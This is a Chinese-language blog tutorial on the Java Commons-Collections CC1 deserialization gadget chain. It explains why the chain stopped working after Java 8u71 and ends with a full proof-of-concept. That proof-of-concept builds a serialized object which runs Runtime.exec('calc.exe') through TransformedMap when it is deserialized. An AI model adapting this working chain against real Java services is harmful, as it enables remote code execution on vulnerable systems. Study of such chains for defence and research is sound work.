2 java安全之CC1浅学( 三 )

value;所以,为了再满足第二个条件,需要给Map中放入一个Key是value的元素:
innerMap.put("value", "xxxx");8u71再次修改POC之后,我们在本地进行测试,发现已经可以成功弹出计算器了 。

2 java安全之CC1浅学

文章插图
但是,当我们拿着这串序列化流,跑到服务器上进行反序列化时就会发现,又无法成功执行命令 了 。这又是为什么呢?
我这儿是拿到另一个Java 8u71以前版本的服务器上进行测试的,在8u71以后Java官方修改了sun.reflect.annotation.AnnotationInvocationHandlerreadObject函数
jdk8u/jdk8u/jdk: f8a528d0379d (java.net)
2 java安全之CC1浅学

文章插图
对于这次修改,乍一看好像原因就是没有了setValue,其实不然,可以看到上边是新增了一个LinkedHashMap对象,并将原来的键值添加进去,所以,后续对Map的操作都是基于这个新的LinkedHashMap对象,而原来我们精心构造的Map不再执行set或put操作,也就不会触发RCE了
小结整体的POC如下
package org.example;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;import java.io.*;import java.lang.annotation.Retention;import java.lang.reflect.Constructor;import java.util.HashMap;import java.util.Map;public class Test {public static void main(String[] args) throws Exception {Transformer[] transformers= new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),new InvokerTransformer("exec",new Class[] {String.class},new String[]{"calc.exe"})};ChainedTransformer chain = new ChainedTransformer(transformers);Map innerMap = new HashMap();Map outerMap = TransformedMap.decorate(innerMap, null, chain);innerMap.put("value","xxxx");Class cls =Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor construct = cls.getDeclaredConstructor(Class.class, Map.class);construct.setAccessible(true);Object obj = construct.newInstance(Retention.class, outerMap);ByteArrayOutputStream array = new ByteArrayOutputStream();ObjectOutputStream writeojb = new ObjectOutputStream(array);writeojb.writeObject(obj);writeojb.close();System.out.println(array);ObjectInputStream readobj = new ObjectInputStream(new ByteArrayInputStream(array.toByteArray()));readobj.readObject();}}但是这个Payload有一定局限性,在Java 8u71以后的版本中,由于 sun.reflect.annotation.AnnotationInvocationHandler发生了变化导致不再可用,原因前文也说了 。
ysoserial工具中没有用到TransformedMap,而是使用了LazyMap
那么LazyMap解决了这条链在高版本Java中的使用吗?如何解决的呢?
下一篇文章来分析分析 。
【2 java安全之CC1浅学】

经验总结扩展阅读